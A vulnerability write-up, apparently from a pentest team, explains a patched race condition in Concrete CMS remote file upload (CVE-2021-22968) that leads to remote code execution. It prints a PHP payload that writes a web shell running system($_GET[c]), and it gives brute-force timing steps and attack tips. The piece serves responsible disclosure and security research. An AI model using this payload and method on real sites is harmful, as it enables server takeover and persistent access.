Multiple Concrete CMS vulnerabilities ( part1 – RCE )

INTRO

Concrete CMS is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. It provides  version management for every page,similar to wiki software, another type of web site development software. Concrete5 allows users to edit images through an embedded editor on the page. As of 2021, there are over 62,000 live websites that are built with Concrete CMS.

During a recent pentest, our team found a very interesting vulnerability. Discovery of the vulnerability was relatively simple, however putting a POC together was quite challenging, hence the reason for this post. CVE-2021-22968 was assigned to this issue and was fixed in Concrete CMS version 8.5.7 and 9.0.1. A low privileged user is needed to exploit this vulnerability and obtain remote command execution.

The vulnerability – a race condition in the file upload

As a limited user you can upload files from remote servers. You enter the url and the CMS will use curl to download it and write it locally (or to a bucket in AWS S3). This curl has a timeout of 60 seconds, this will become relevant later.

Now, some of you might be screaming “SSRF!”, which is absolutely fair, but we’ll get to that and how we bypassed all the SSRF mitigations in place in the 2nd part of this series.

Some validations are done on the file extension, for example if you’re trying to download files with the php extension this is what you will get:

The validations, looked pretty good when we checked the source code, but you know what we realized when tracing the code? The validations are done AFTER the file is download locally! Thus, we have a race condition. Our first race condition, because as you will see, we’ll have 2 race conditions to exploit.

Let’s have a look at the code, to see where our file gets downloaded and written:

But where is $temporaryDirectory coming from? There is a special class for this called VolatileDirectory which creates a temporary directory, that gets deleted at the end of each request.

As you see, a new directory gets created and our file will be written here. The name of a directory is supposed to be random, however $i will always be 0 in practice so we need to check uniqid()’s behavior, we’ll look at this in a bit. Another problem that we have is that after the file is imported in the CMS, the entire directory gets deleted, together with the downloaded file:

Uniqid() behaviour

Ok, so as we said let’s check the uniqid() function in the php source code, to see what it returns:

This is really simple, there’s nothing to be scared of. As you can see it simply executes gettimeofday() which returns the seconds and microseconds. The more_entropy parameter is not used in the CMS source code, so there’s no real entropy used here, the entire return value is based on seconds/microseconds and as we know these are highly predictable and we can bruteforce this. We only need to have enough time to do this, because in our initial tests a request took about 100ms to execute.

We need a plan

So basically in order to guess the name of the random directory we need to guess the second and microsecond that the server will use. We can guess the second part easily by syncing our host’s time with the server time, based on the response headers. We should also place our attack server in the same time zone or AWS region, as close as possible to the target. But a request takes about 100ms time to execute, thus we need to extend this request’s execution time as much as possible so that we have time to bruteforce the volatile directory name. There are 1M possibilities directory names to check for, 1 for each microsecond. How can we achieve this? Very simple, we will add a sleep() for 30-60 seconds in the test.php file which gets downloaded from the remote server. This will basically force the CMS to keep the $temporaryDir directory for 30-60 seconds on the local filesystem before deleting it. Enough time for us to bruteforce the directory name with Turbo Intruder. When we found the existing directory we will get back a 200 HTTP response code. Bellow is the test.php file which we used (this php file echo-es another php file; and the echoed php code will write a php shell in the parent directory ):

<?php 
set_time_limit(0);
sleep(35);
echo '<?php file_put_contents("../shell.php","<?php system(\$_GET[c]) ;");';
echo '?>' . str_repeat("A",50000000);
flush();
ob_flush();
?>

Here’s a diagram, of all the relevant moments of the attack, hopefully this will make things a bit clear.

Timing of the relevant race conditions
  • at T0 you start the upload request AND also start searching for the the volatile dir name. You have 1M possibilities, we managed to send 16-17K RPS, so you can easily brute-force 500-700K in ~30 seconds, that’s a 50% chance, works great. We didn’t queue 1M requests, due to some issues with Turbo Intruder.
  • at T1, you found the volatile dir name (won first race), but test.php isn’t written yet in the directory. Thus you have to start search for test.php (2nd race condition) which will ALWAYS be written after ~30 seconds (from T0). We queue another 500K requests in Turbo Intruder for this.
  • at T2 (~ 30th second) test.php is written locally, inside the volatile dir
  • at T3, one of the queued requests from T1 hits test.php and by executing it, we wrote a permanent shell in the parent directory (“/application/files/tmp”) – we won the second race
  • at T4 both volatile dir and test.php inside get deleted, but we already have a shell 🙂

After we guess the name of the directory we will request test.php, which will write a permanent shell in the parent directory. Here’s a screenshot from Turbo Intruder with the guessed directory name:

The second race condition

By making test.php to execute for ~30 seconds in order to guess the directory name, we have created a second race condition. We now don’t know exactly when test.php will be written on the CMS filesystem, but it will obviously be, after it has finished it’s own execution on the remote server (sleep  time + a few more milliseconds). In practice this means that if we guessed the directory name in the 10th second we will have to queue another 500K-1M requests in turbo intruder and this will have to cover all the time interval until test.php gets written to the file system. Worst case scenario, you have to send enough requests for another 30 seconds.

You can see in the screenshot above (tail -f access_log), how we keep sending requests for test.php inside the directory name we’ve guessed previously. Once test.php gets found and executed it writes a permanent shell in the parent directory.

RCE

We hope things have been pretty clear so far, here’s our shell that gives us RCE & persistence:

Discovering this vulnerability was relatively easy, however putting a POC together was a very time consuming activity. We also had to workaround a few Turbo Intruder issues, which resulted in this issue and a few others, thanks to @albinowax for addressing this. All the code is published here.

Tips

  • the timeout for curl is 60s, do not sleep() more than 60s in test.php
  • use http2 if possiblle
  • use tail -f access_log and tail -f error_log to monitor your requests and any errors
  • check that your upload request from request.txt is still a valid session
  • the upload request is bound to a single ip by default

Timeline

  • 30/10/2021 report sent to the vendor
  • 08/11/2021 patched released (versions 8.5.7/9.0.1)
  • 15/11/2021 published this write-up